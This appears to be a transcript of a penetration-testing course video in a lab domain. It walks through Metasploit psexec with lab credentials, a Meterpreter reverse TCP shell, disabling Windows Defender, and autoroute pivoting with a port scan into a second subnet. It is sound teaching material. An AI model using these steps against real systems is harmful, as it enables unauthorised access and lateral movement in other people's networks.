picking up right where we left off. So let's go ahead and use psexec. So I'm going to say use exploit Windows SMB psexec. We'll say options. And then we are going to be at, I'm actually going to make this full screen just for ease. We're going to set the R host to 192.168.57.141. That is Frank Castle's machine. We'll set SMB domain to marvel.local. We'll set SMB pass to password1. Set SMB user to fcastle. So go ahead and get all that typed out. If you need to pause at any time, if I'm typing too fast, just go ahead and pause. I'm trying to delay just a little bit here, but from here, let's go ahead and set the payload to Windows, and we'll say x64 interpreter, and we'll say reverse TCP, and then we'll set lhost to eth0, type in options, and we should have all of our stuff set. So we got the correct IP address, correct domain, password, user, and then we've got the correct lhost here. So let's set the target to 2. Remember, that's the file upload. We'll go ahead and run this, see if it works. And we got status virus infected. Good job, Windows Defender. Let's go ahead, if your Defender kicked on, let's go ahead and just turn it off one more time. So what I'm going to do is I'm going to come over here and just go into Defender. And even though I have the group policy in here, it still comes back on for me. It hates me. So let's go ahead and manage settings and turn off. Yes. Let's do this one more time. So let's go in and run this exploit. And now we have a shell. Okay, so from here, what we're going to do is we are going to look at the network. Let's get a shell and let's just talk about this. This is some post exploitation, right? We want to run a route print and see what the routing is on this. I always do this and just check, and you can see there's 10.10.10.0 on here and the 192.168.57.0 in the routing table. So we know that there's 2 NICs. I mean, the other way to look at that is just to say ipconfig and look at that right here, right? So 192.168.57.141, 10.10.10.128. We could say arp-a and see what it's talking to in terms of machines that are out there. And we know that 128 exists, but look, it's also talking to 129. So we do know that 129 is out there. So how the heck do we make sure that we can talk to 129? Well, we're going to pivot here. And every time I say this, I think of the Friends TV show, the whole pivot scene. If you've never seen that with the couch, that's what I think about every time. Go ahead and Google that. It's pretty funny. So I'm going to go ahead and hit Control-C here and just back out. And then what we can do from here is we can actually just say run autoroute. And we're just going to say -s. And this is going to set up a route for us to this network. So what we're doing is we're saying, hey, from the IP that we exploited, which was 192.168.57.0/24 network, go ahead and make a route from that to this through this machine. So we're going to do that. And it's going to say it's deprecated. Don't worry, it's fine. And we're going to come here. We added the route. And then now we can say run autoroute. And then we can say -p like it says to list all active routes. Make sure that we do have a route here, which we do. The route is going through session 1, which is appropriate. Now we can background this and we can come in here and we can do something like search port scan. And we can just say use, we'll do 5. We'll do a TCP scan, options, set our host 10.10.10.129. And we could do a ping sweep. We could do a lot of things here, but the proof of concept is that we're just trying to attack this machine or just prove that we are pivoting into this other network. So what we're going to do as well is we're just going to say, I'm going to set the port to, I'll just pick 445 because we know that's open, and we'll just run this. And you can see TCP open on 10.10.10.129. So we have successfully pivoted into this network through this other machine. And this is just one example of pivoting. But what's important right now is the concept of pivoting. You're going to pick this up over time. You'll learn all different kinds of tools, and you'll pick up your favorite tool that you like to use to pivot. But for now, just understanding the concept of pivoting and what it means is really important. From a practical level, you will encounter this from time to time. I would say it's not high probability, but it doesn't mean that you won't encounter it. So understanding the concept of what it is and then learning how to do it through a tool such as Meterpreter or through something like proxy chains, which we won't be covering, but you should read up on. It's fantastic. It's a good topic to learn about. And again, that tool is proxy chains. If you're curious, you can utilize pivoting through a few different ways, not just Metasploit, but you can use SSH pivoting as well if SSH is open on the box. And there's different tools that will do a lot of the same things. So I encourage you to read up on the topic. And from here, that's it. We're going to go ahead and move into cleanup, and then we'll wrap up the networking section.